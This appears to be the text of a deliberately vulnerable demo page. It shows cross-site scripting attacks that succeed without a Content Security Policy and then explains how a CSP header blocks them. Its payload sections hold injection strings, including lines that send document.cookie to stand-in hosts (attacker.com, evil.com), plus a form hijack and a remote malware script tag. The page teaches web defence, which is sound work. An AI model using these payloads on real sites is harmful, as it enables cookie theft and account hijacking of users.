🚨 No CSP Protection - Vulnerable Website
This page has NO Content Security Policy - Everything is allowed!
⚠️ Security Risk: This page has no CSP protection!
Any script from any source can execute. This demonstrates why CSP is crucial.
Any script from any source can execute. This demonstrates why CSP is crucial.
🔍 Current Security Status
Content Security Policy: NONE
Inline Scripts: ✅ Allowed (Dangerous)
External Scripts: ✅ Allowed from ANY domain (Very Dangerous)
eval() Function: ✅ Allowed (Extremely Dangerous)
Inline Styles: ✅ Allowed
💀 Attack Demonstrations (All Will Work!)
1. Inline Script Injection
Try entering malicious scripts in this input:
Output will appear here...
2. External Script Loading
Load external scripts from any domain:
No external scripts loaded yet...
3. eval() Function Usage
Execute dynamic JavaScript code:
4. Inline Event Handlers
Dynamic HTML with event handlers:
Click me">HTML output will appear here...
🎯 Pre-loaded Attack Examples
These attacks are already active on this page:
Active Inline Script:
<script>
console.log('🚨 Inline script executed without CSP protection!');
// This could be malicious code from an attacker
</script>
External Resource Loading:
Loading image from external domain (could be tracking pixel):
In a real attack, this could be a malicious domain!
Unprotected Form Submission:
⚔️ Common Attack Vectors That Work Without CSP
<!-- 1. Script injection in user input -->
<script>
// Steal cookies
fetch('https://attacker.com/steal?cookies=' + document.cookie);
</script>
<!-- 2. External malicious script -->
<script src="https://evil-cdn.com/malware.js"></script>
<!-- 3. Image with malicious onerror -->
<img src="invalid" onerror="eval('malicious code')">
<!-- 4. Form hijacking -->
<form action="https://attacker.com/phish" method="post">
<!-- 5. Iframe injection -->
<iframe src="javascript:alert('XSS')"></iframe>
🔥 Try These Payloads:
<script>alert('No CSP = Easy XSS!')</script><img src=x onerror=document.body.innerHTML='Hacked!'><iframe src="javascript:alert('Frame injection')"></iframe><svg onload=fetch('//evil.com/steal?data='+document.cookie)>
🛡️ How CSP Would Fix These Issues
With a proper Content Security Policy, all these attacks would be blocked:
<!-- Basic CSP Header -->
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'
<!-- What this blocks: -->
❌ Inline scripts (like the ones above)
❌ External scripts from unauthorized domains
❌ eval() function execution
❌ Inline event handlers (onclick, onerror, etc.)
❌ javascript: URLs in iframes
<!-- What this allows: -->
✅ Scripts from same origin only
✅ Stylesheets from same origin + inline styles
✅ Images, fonts, etc. from same origin
Next: Check out our CSP-protected examples to see the difference!